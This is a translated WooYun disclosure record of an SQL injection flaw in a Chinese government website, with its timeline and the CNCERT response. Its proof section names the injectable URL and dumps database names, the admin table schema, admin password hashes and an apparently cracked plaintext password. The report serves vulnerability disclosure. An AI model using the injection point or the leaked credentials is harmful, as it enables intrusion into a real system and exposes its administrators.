Vulnerability Summary

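Bug ID: wooyun-2015-0130851

Title: SQL injection vulnerability in the China Jiangyan government website

Vendor: cncert National Internet Emergency Center

Author: dalamar

Submitted: 2015-08-03 21:00

Fixed: 2015-09-20 10:24

Disclosed: 2015-09-20 10:24

Vulnerability type: SQL injection

Severity: Medium

Self-assessed Rank: 10

Status: Handed over to a third-party partner organization (cncert National Internet Emergency Center) for handling

Source: http://www.wooyun.org. For questions or help, contact [email protected]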

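Vulnerability Details

Disclosure status:

2015-08-03: Details reported to the vendor; awaiting vendor handling
2015-08-06: Vendor confirmed; details disclosed to the vendor only
2015-08-16: Details disclosed to core white hats and experts in related fields
2015-08-26: Details disclosed to regular white hats
2015-09-05: Details disclosed to intern white hats
2015-09-20: Details disclosed to the public

Brief description:

As the title says.

Detailed description:

SQL injection vulnerability in the China Jiangyan government website
Injection point: http://www.jys.gov.cn/public/js/count.php?i=262648

Proof of vulnerability: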

Database: jiangyan
[25 tables]
Database: loyaa3
[46 tables]
Database: old_jys_web
[10 tables]
Database: information_schema
[28 tables]
Database: jys_gov_cn
[10 tables]


Database: jys_gov_cn
Table: admin
[8 columns]
+---------------+------------------+
| Column        | Type             |
+---------------+------------------+
| admin_caption | varchar(150)     |
| admin_id      | int(11) unsigned |
| admin_name    | varchar(50)      |
| admin_pass    | varchar(32)      |
| admin_time    | datetime         |
| admin_type    | char(1)          |
| admin_user    | varchar(32)      |
| author_id     | int(11) unsigned |
+---------------+------------------+


Database: jys_gov_cn
Table: admin
[3 entries]
+----------------------------------+---------------+
| admin_pass                       | admin_name    |
+----------------------------------+---------------+
| fb17403e1929d90c362c1f00e03299ca | <blank>       |
| 4be185d60d63a3965347267f813f30d7 | <blank>       |
| 187f1568e64af66c5da1dea0d2cf6ca1 | administrator |
+----------------------------------+---------------+


After MD5 decryption: jydzzw_16

Remediation:

You know what to do.

Copyright notice: please credit the source dalamar@WooYun when reposting


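Vulnerability Response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2015-08-06 10:22

Vendor reply:

CNVD confirmed and reproduced the reported issue. CNCERT has passed it to the Jiangsu branch center, which will coordinate follow-up handling with the organization that manages the website.

Latest status:

None yet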